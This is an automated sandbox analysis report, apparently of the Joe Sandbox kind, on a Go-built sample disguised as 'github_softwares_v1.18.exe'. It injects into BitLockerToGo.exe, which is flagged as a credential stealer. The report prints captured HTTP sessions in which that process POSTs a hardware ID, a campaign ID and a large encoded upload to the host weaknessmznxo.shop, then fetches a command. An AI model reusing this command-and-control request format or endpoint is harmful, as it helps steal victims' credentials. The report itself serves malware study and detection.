2024-07-26 18:34:08 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 43 38 45 44 31 42 34 44 34 35 42 41 35 41 41 34 44 43 42 34 35 35 38 39 46 41 35 43 46 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 6b 6f 6c 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C1C8ED1B4D45BA5AA4DCB45589FA5CFC--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@koln
2024-07-26 18:34:08 UTC	5111	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 Data Ascii: `M?lrQMn 64F6(X&7~`
2024-07-26 18:34:09 UTC	806	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:34:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=toafdacstq7elsbr6cpr2td6ec; expires=Tue, 19-Nov-2024 12:20:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zb7AebNcHIAloajCd6cvEX0KNDAvc8z67SKdE%2BCD%2Bwqp4tnuJBd%2BVrHGo3fcgAaygs%2F3ZVHl7f1u5AoQwCWcQSSsjIRa%2FO1ccjzTdSRFWjBYYe82Fx3qRBuL0h0dN9YesVXO4Mo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a967b6e7b444372-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 18:34:09 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-26 18:34:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49736	172.67.159.243	443	7056	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:34:10 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1279 Host: weaknessmznxo.shop
2024-07-26 18:34:10 UTC	1279	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 43 38 45 44 31 42 34 44 34 35 42 41 35 41 41 34 44 43 42 34 35 35 38 39 46 41 35 43 46 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 6b 6f 6c 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C1C8ED1B4D45BA5AA4DCB45589FA5CFC--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@koln
2024-07-26 18:34:11 UTC	804	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:34:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nnlf87j7kf7mhg9hlsn4sso5mj; expires=Tue, 19-Nov-2024 12:20:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GwRkXA4Ou1hTROEg1eXPxSxukioNjVevVC1FTEtZhxDcvOlzm6TWPCDFJ%2BP2hFr6CIYS6QdzTbRScaPRWHG3kkaJqloChniDzNueMkfFF%2B5JmAsnGBacjlA3%2BBT6IlqgH%2F1YR2g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a967b7aec4442ad-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 18:34:11 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-26 18:34:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49737	172.67.159.243	443	7056	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:34:12 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 550577 Host: weaknessmznxo.shop
2024-07-26 18:34:12 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 43 38 45 44 31 42 34 44 34 35 42 41 35 41 41 34 44 43 42 34 35 35 38 39 46 41 35 43 46 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 6b 6f 6c 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C1C8ED1B4D45BA5AA4DCB45589FA5CFC--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@koln
2024-07-26 18:34:12 UTC	15331	OUT	Data Raw: 95 e2 07 49 6d fc d4 75 8c 89 13 dd cb 36 7e 60 f2 29 70 3c 9c aa 7c ff 3c 02 ea 0d 51 1a 0a df 8d 1b 06 3c c9 31 b1 fe 3f 97 11 f6 55 00 4d 5c ce cd b6 f8 cb 80 ed 93 7c 74 1a 5b 41 cc 74 81 ee 69 2c 10 bb a2 0e 2b e5 13 92 43 7c 0b ce 3a 0b 0a 04 48 13 d7 6f 8c 9f 88 13 a0 cd 17 ab 4f c5 df 09 b7 db 88 08 38 16 b6 97 61 f4 87 90 ad b3 f3 41 94 71 10 5e 1f 94 74 04 f9 4f e6 41 70 36 54 29 85 3f d2 0c 17 ee 07 0e 5a 9d 80 5c cd f3 16 44 aa 6f 5c 5a 14 b8 f1 6f cb c7 01 97 be b1 be 77 69 23 f6 43 4e ef d0 a1 9a f5 1b 57 a9 50 81 7d 45 87 49 c9 d5 c4 10 d7 c9 b4 28 14 dc bb df 47 c4 08 13 8a 4c 3b 31 34 2d 07 03 92 fc e3 a9 b9 a0 38 d8 d1 65 cd a1 41 03 3f 1d b0 74 f0 7d 9f 1e d8 6e 2c bf fb e6 d4 e8 e0 c5 dd fd de 37 4e f6 4a f7 4e 8e 29 da bf 75 28 a9 ca Data Ascii: Imu6~`)p<\|<Q<1?UM\\|t[Ati,+C\|:HoO8aAq^tOAp6T)?Z\Do\Zowi#CNWP}EI(GL;14-8eA?t}n,7NJN)u(
2024-07-26 18:34:12 UTC	15331	OUT	Data Raw: 61 de 63 9a a5 43 06 f2 7c ac e4 a4 2e 2d b5 4e a4 d4 4b 74 61 6a b5 14 de b6 06 e3 03 86 6b a9 26 dc ef 1f c7 e3 ca 46 27 a7 a7 a3 eb f4 27 94 9c 55 c0 4e c7 08 88 20 b7 0f 4f b5 0c 24 aa 28 29 46 c4 fd 7a 7f e2 98 7c a4 81 53 97 21 ce ef b8 0a 9f 1f 2f 5f ad ab 83 7b d4 58 f6 eb 5d 06 81 ff ae 9a f5 b4 c0 ab 12 1e 1e cd cf 23 1e 8b e6 17 5a 53 ea 5b 12 da d9 24 a7 fd 6a a3 f6 51 1c 41 0e 25 b4 07 67 f2 50 77 49 bc 52 e5 95 60 6a cb 9d d0 da 3d f9 93 72 fd fc df d5 b3 26 af 8c fe 3e 1b 7d 35 3d 64 1f df dd 20 d1 3e 6a b3 e1 f3 c6 68 d8 5f fc 97 62 ed 54 08 3f fa 27 b3 7b dd e9 8a df a3 4c 43 44 67 96 68 56 6e 8b ac d0 fa 70 ec b1 21 a8 3b 6a 4b e4 e9 8e 02 95 74 96 f2 04 2f 5d 24 43 e2 05 3b 58 34 5d 8c 39 be 39 cb ed 7e cf d1 6f 35 c1 7b e8 ff da 61 da Data Ascii: acC\|.-NKtajk&F''UN O$()Fz\|S!/_{X]#ZS[$jQA%gPwIR`j=r&>}5=d >jh_bT?'{LCDghVnp!;jKt/]$C;X4]99~o5{a
2024-07-26 18:34:12 UTC	15331	OUT	Data Raw: 1b 28 69 4c 33 7a 79 eb 59 2c 55 8c 5d 76 73 37 3d ca fa d3 b3 bd 9f d0 30 a3 72 c9 e5 c0 c6 8b 7e 81 9e cc 8a cf 23 35 15 2f ff 61 31 b9 f9 b1 a7 ab a7 56 fe 38 31 a9 cd e7 84 ba c6 7e 6e fd a6 fa 1a bb db bc e2 5c fb b4 3f 93 9a b7 17 38 0a 17 01 cc ad d3 c0 f1 c2 0e 9e 9d 3a bd b2 85 c2 2c b7 61 09 56 e9 81 36 0e 47 1d 1f 6e f3 75 fd d1 bd 08 ab 09 b9 c9 02 69 20 1b 13 72 cb 6b 1e a2 db 85 da 1b 7c 50 c7 cf f4 be 21 b7 99 3c 0d b7 d0 02 0e 1f 7f 6d 20 3e c2 14 78 c8 ff 7f 47 a0 23 99 a3 10 28 43 43 4d 06 e0 5a 59 2e 22 b2 24 22 35 4b 51 e0 42 c8 53 6d be 35 ba b8 2a f6 d5 2b c5 21 ad 1f 80 b0 87 e8 88 79 86 25 7e 99 74 f5 e0 06 16 3f 31 8c 52 41 81 c4 8f 9c 10 9b 08 9b c4 50 c3 26 ab d2 20 da f8 6c e3 82 ab 01 eb 2e dd f5 c6 4d e3 de 19 c3 b5 3e 62 4c Data Ascii: (iL3zyY,U]vs7=0r~#5/a1V81~n\?8:,aV6Gnui rk\|P!<m >xG#(CCMZY."$"5KQBSm5*+!y%~t?1RAP& l.M>bL
2024-07-26 18:34:12 UTC	15331	OUT	Data Raw: 34 51 0e a2 2c 85 49 3d e3 a0 ff 17 15 2e d3 97 e7 bd b4 ed 69 84 79 be 8c 7c ed 02 98 4a 98 13 f2 6a 7e 8f 19 cb 48 34 b5 27 fe 1b 89 40 53 43 c5 f6 48 63 e7 51 9e 68 f3 76 94 b9 93 c6 af cb f8 97 7e 5b ef 41 74 c7 b9 00 56 1f 82 c4 32 02 98 be e9 74 9b 35 33 bb f3 e4 ea 09 ce 35 03 3c 7e 4a 37 f8 ab 64 20 96 07 23 8c e9 55 18 47 33 a2 8a ba 8d e6 64 3f 58 33 9a 8c b1 e1 42 8d f2 56 ee 99 4e 49 a3 23 e3 77 66 86 2a e2 37 5f 0a 50 f8 39 77 46 83 b1 f5 a4 da eb 4c 66 c4 df 83 e4 3a 89 48 e3 3a 04 3b 10 26 51 8e ba 44 a4 f5 a1 19 71 e5 ea e9 f0 3d be a5 a7 7c 2a 92 c9 96 f6 19 09 38 21 c1 fd 8c 92 3d bb 74 b8 a4 ef b2 a6 37 9e 49 44 1e e6 33 a9 fa b1 d2 a4 75 73 35 b3 75 8b 3b ac 49 07 23 04 5e 0f a8 8d 67 bd e1 02 7f be 8e 3d 89 ac 31 d2 cd 4a e0 15 02 b7 Data Ascii: 4Q,I=.iy\|Jj~H4'@SCHcQhv~[AtV2t535<~J7d #UG3d?X3BVNI#wf7_P9wFLf:H:;&QDq=\|8!=t7ID3us5u;I#^g=1J
2024-07-26 18:34:12 UTC	15331	OUT	Data Raw: 29 49 cd 54 8e fb 91 a8 1b 4c 8a 23 7d 7b 18 f5 fc b0 ac 28 70 6c 92 1b 8a d4 f9 fa 6d c9 32 bd a2 a3 29 9e 73 45 58 fc c7 df dc 0e 57 ec 1d 38 c8 1f 3a 81 09 f5 47 fd 58 c0 c5 66 d5 99 d0 cc c3 26 42 24 38 f3 4f 02 2b bd 58 09 2a d7 c6 c1 b2 6f 7a 45 61 f6 6e 19 d8 10 03 bf e4 62 d7 47 89 0e b6 bd 3a 4b ac ae ef 96 b0 bd f0 c2 8b a7 ff 3b 4c 73 3d 03 7b 87 4b 5a 84 fe 0a b1 13 55 65 22 a9 b0 cd 58 ad 28 cb 6e 5d ad f6 19 ca 50 f7 c3 bc d7 07 f7 67 9f b9 80 be b9 c6 38 b3 33 53 e4 2a 74 93 aa ae b9 8c 9e 45 2f e7 cc d8 1c 25 d3 59 4b aa b4 31 00 de a2 19 f3 ac 3e 52 9a 08 20 ec 11 8b 52 e2 66 37 6c af 0d fe bb 2e 39 52 c3 ec 9c fa 99 20 77 dc 19 de 07 1a 54 76 f6 3b cc b6 40 18 70 48 8a 21 df 00 53 c3 2e 71 81 07 e2 0c 3d 44 da dd bd be ef fd d6 ec dd 26 Data Ascii: )ITL#}{(plm2)sEXW8:GXf&B$8O+XozEanbG:K;Ls={KZUe"X(n]Pg83StE/%YK1>R Rf7l.9R wTv;@pH!S.q=D&
2024-07-26 18:34:12 UTC	15331	OUT	Data Raw: a8 d5 e9 ed f3 df 6e 54 93 d2 95 15 ff b4 8b 38 02 0c 9b c2 21 ec 28 2e 6a 72 c4 47 eb f9 c7 b1 78 97 3b 81 df 8e 3c 5a da ca f4 32 de 27 b2 e1 e5 28 a0 50 dd f3 d2 1b 53 34 7c 19 87 47 7c ff 9d 8e 1d 2b 5e 30 27 f1 7f dd 6c 47 d4 01 69 a7 2a a3 9b d9 e6 a9 be 4f 1c 5c f9 27 75 47 ac 33 0f a2 48 10 26 94 f6 d8 23 c7 e6 6b 21 30 fb 2c 14 22 ca 65 29 43 8e c2 bd 27 39 5a e7 d2 b8 f7 7a d0 31 7d 78 97 8b c4 40 de fb 91 16 6d 9b 9a b5 a2 59 1e 72 25 6b 9a 99 23 d4 29 1a ee 22 59 1c 51 7d 04 58 8c 66 6a a0 be 63 7b ff d2 86 2b 1a ae e2 20 b5 06 6c ec d5 c8 72 c8 da d1 5e 02 f0 d4 38 41 c4 a1 10 3c ab d8 39 3b 4b 64 92 75 78 f0 fb 15 4a e5 ae db 4a cc 91 09 96 a5 58 16 36 ec e7 af 56 ff df 05 be cc c3 cc 92 e2 63 c2 0b 97 63 32 75 30 c6 e7 c9 be bc b3 32 71 86 Data Ascii: nT8!(.jrGx;<Z2'(PS4\|G\|+^0'lGi*O\'uG3H&#k!0,"e)C'9Zz1}x@mYr%k#)"YQ}Xfjc{+ lr^8A<9;KduxJJX6Vcc2u02q
2024-07-26 18:34:12 UTC	15331	OUT	Data Raw: 2f 0b 42 4a 82 8c 15 db 88 47 07 87 f3 17 0d 6c 7a b3 8b 3b da d1 6d 7f 0c 05 83 c0 23 28 c3 61 6f e9 a5 62 b9 94 11 97 53 9b d2 08 cf 65 e7 4c e3 26 f4 29 44 68 24 d6 0b a9 4e 5d cd 4e dd f5 06 03 5c ce af cb b1 e2 9d f1 f2 c1 df 7d 61 6d 7c 71 d2 37 df a1 fc 6b 53 19 2c bd 1d 7b 59 44 46 13 ba 49 56 11 c1 54 ec 35 48 d8 a8 e2 10 ee e5 98 ee ef 1f 89 a2 28 8c de 5a 25 57 1e e7 e8 d5 57 73 53 fe 01 3d 8a 90 86 d1 31 ad 95 ea 65 0f 6b 4b 9c 98 c8 b0 fa 94 10 ce ed e3 4f 2e b0 2a 1d 9c 3a 92 7b 24 34 f9 c8 c9 f3 ff 4e 9b b1 48 eb a2 3b ec 88 92 6f 6c b1 6d b3 72 51 2b 3d a7 a1 8c 6c 9f c4 9d 17 97 a6 0d 47 3f d9 41 9f 79 9e c0 67 b1 60 5e b8 2f fd 1c d0 5a 38 40 2c 41 20 8e f2 6e ca f6 5f 49 1b c0 02 72 38 74 8e 0f 94 5b b9 ff f2 76 3f f9 04 74 1e e1 c4 d8 Data Ascii: /BJGlz;m#(aobSeL&)Dh$N]N\}am\|q7kS,{YDFIVT5H(Z%WWsS=1ekKO.*:{$4NH;olmrQ+=lG?Ayg`^/Z8@,A n_Ir8t[v?t
2024-07-26 18:34:12 UTC	15331	OUT	Data Raw: 84 33 80 d3 76 f4 03 b2 b8 73 a8 5d 86 a8 0e fd c8 1f ef 7c b7 2e 6b cb 4f 54 9b 13 34 05 80 04 56 2a d5 3d 4f 8d b0 a0 a7 67 84 3e 7a b7 41 7f e8 c4 80 6f fa 93 d6 ee cf 0f f3 cd 04 79 b7 e6 ed 3f 19 51 ff 77 4b 4c 10 84 f8 2c 2e a2 81 36 fe 0a 0e bc 45 17 0a a0 86 c9 64 c9 7f 82 d3 b4 7d 12 37 8f d5 58 1a f3 fb ea 20 18 30 e0 04 39 47 96 da 8b a2 07 38 14 2a 0d 73 25 0f f7 4b 8d b8 c6 63 47 54 e9 02 18 6d 96 67 34 35 18 e0 d7 1f b3 c6 56 00 9f 8a f9 e0 71 91 37 5b 71 fb a6 ad d0 bc 76 3e 7c 66 ce 54 cd 89 53 9b cf 2a 52 8d 79 05 c7 c4 ef 41 b0 51 b7 fe fa 15 07 09 d4 f5 84 09 08 dc 20 e0 1a 70 f5 ca 51 21 bb a9 fc 00 c2 41 2b c4 bd a1 3b b9 76 ad 39 b3 64 17 1b 53 a7 11 ec 65 4b bc 07 e6 35 3a 89 90 74 b0 c6 18 9d b4 89 28 c0 6d 9f cd 49 a0 0b 08 fc 9a Data Ascii: 3vs]\|.kOT4V=Og>zAoy?QwKL,.6Ed}7X 09G8s%KcGTmg45Vq7[qv>\|fTS*RyAQ pQ!A+;v9dSeK5:t(mI
2024-07-26 18:34:12 UTC	15331	OUT	Data Raw: da 6b 0e ea 99 7c 91 ce 23 27 23 e8 2f 6f 4a 4e 98 5a 7e 8a e6 df e0 f3 21 a0 6b af a3 09 67 f8 af 49 0a 3a ce eb d3 04 be da ff df 4b 6f ac e3 f4 4e 66 42 7c 4c 62 d9 4e 43 5e e6 5d 35 2f 41 c4 1b b3 e8 b1 c6 44 c0 b0 3b 0a f2 0f cf a8 40 f9 bf cc 98 ee 0e c3 17 af 7e 11 ad dc 79 b3 98 ad 81 80 c8 2f ae a9 a7 bd 59 57 f3 c3 19 09 f9 4b 35 13 2e 53 f0 44 6d 13 a9 02 ad 2e 60 d9 ba 23 f4 28 0c c3 d4 a0 18 b5 42 53 9c b7 fb f5 e5 22 95 94 09 00 3b 39 7a c7 f9 1b 43 be b3 03 3d 3d a4 0f b8 ce 1f 18 ad 09 ef b9 2d e0 18 b4 f0 6a de 5e 85 d8 42 cf f2 18 ac 94 1b 2c b9 eb 92 2f b6 30 10 26 15 e9 dd ac dc 31 b6 54 ac 4d 8f a2 d6 cd 7a e4 85 20 dc 0b 18 fb 73 7d ec 15 61 10 e2 3d 37 2b 0f 87 f9 41 af 35 93 26 3e ec 49 81 45 1d 3f 51 25 59 b3 7d 15 dc f7 92 41 4e Data Ascii: k\|#'#/oJNZ~!kgI:KoNfB\|LbNC^]5/AD;@~y/YWK5.SDm.`#(BS";9zC==-j^B,/0&1TMz s}a=7+A5&>IE?Q%Y}AN
2024-07-26 18:34:15 UTC	812	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:34:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2jv7nc32rsdck9v5skavgp078p; expires=Tue, 19-Nov-2024 12:20:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xp58e4XWvQPpU0WoO3LCw%2Bpsmul14f6fxm3CTXSaBWrx%2Bk9qlsoRe%2Fp%2FJ2Wzw5t1rFJrt%2BS1%2F%2FTA8A6ygGpvdWsY4zb0zsmoo09f98cGWN7v%2BV7I1o2JXaNuPARzk4B0m9iNTMY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a967b853fa94381-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49738	172.67.159.243	443	7056	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:34:16 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: weaknessmznxo.shop
2024-07-26 18:34:16 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 40 6b 6f 6c 6e 61 75 73 67 62 26 6a 3d 26 68 77 69 64 3d 43 31 43 38 45 44 31 42 34 44 34 35 42 41 35 41 41 34 44 43 42 34 35 35 38 39 46 41 35 43 46 43 Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--@kolnausgb&j=&hwid=C1C8ED1B4D45BA5AA4DCB45589FA5CFC
2024-07-26 18:34:17 UTC	798	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:34:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ujh4u9nfg6cana4ps4mno068ij; expires=Tue, 19-Nov-2024 12:20:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P9cwA95zUpvsUmhya9bpZ48CPoqVzGW7QtQI2xw7nuhSTHNHnxt7OhAshe2XbcxoX835OEfBjBfzHmsGuKwL3CpszP6gvncE0THS9vE%2FcwXLvkt5Sxc94P3r22c4vCyRapflzaU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a967b9c7df2c328-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 18:34:17 UTC	54	IN	Data Raw: 33 30 0d 0a 36 54 62 61 4b 43 6f 78 51 74 79 68 73 7a 78 47 45 4f 69 7a 2b 6c 61 2b 50 56 67 44 37 35 66 52 42 66 4d 64 45 6f 2b 41 55 78 71 79 61 77 3d 3d 0d 0a Data Ascii: 306TbaKCoxQtyhszxGEOiz+la+PVgD75fRBfMdEo+AUxqyaw==
2024-07-26 18:34:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	14:33:58
Start date:	26/07/2024
Path:	C:\Users\user\Desktop\github_softwares_v1.18.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\github_softwares_v1.18.exe"
Imagebase:	0x7ff764030000
File size:	30'190'080 bytes
MD5 hash:	444CF08B351822E4BEC5C4C1B9324942
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Yara matches:	Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1708564024.000000C0006DC000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000000.00000000.1663970758.00007FF764F18000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000000.00000002.1711084287.00007FF764F18000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:34:02
Start date:	26/07/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Imagebase:	0x5e0000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1777480522.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	16.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	44.4%
Total number of Nodes:	430
Total number of Limit Nodes:	39

Executed Functions

Function 02A0B260 Relevance: 58.1, Strings: 46, Instructions: 557
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Y, xrefs: 02A0B740
i, xrefs: 02A0B933
v, xrefs: 02A0B62E
h, xrefs: 02A0B5BE
K, xrefs: 02A0BA5D
a, xrefs: 02A0B5CE
p, xrefs: 02A0B94B
p, xrefs: 02A0B5AE
Q, xrefs: 02A0B700
T, xrefs: 02A0B49E
S, xrefs: 02A0B710
u, xrefs: 02A0B943
N, xrefs: 02A0B2A7
;, xrefs: 02A0B366
P, xrefs: 02A0B54E
S, xrefs: 02A0B57E
f, xrefs: 02A0B5DE
I, xrefs: 02A0B4AE
R, xrefs: 02A0B4EE
", xrefs: 02A0BB9F
H, xrefs: 02A0B56E
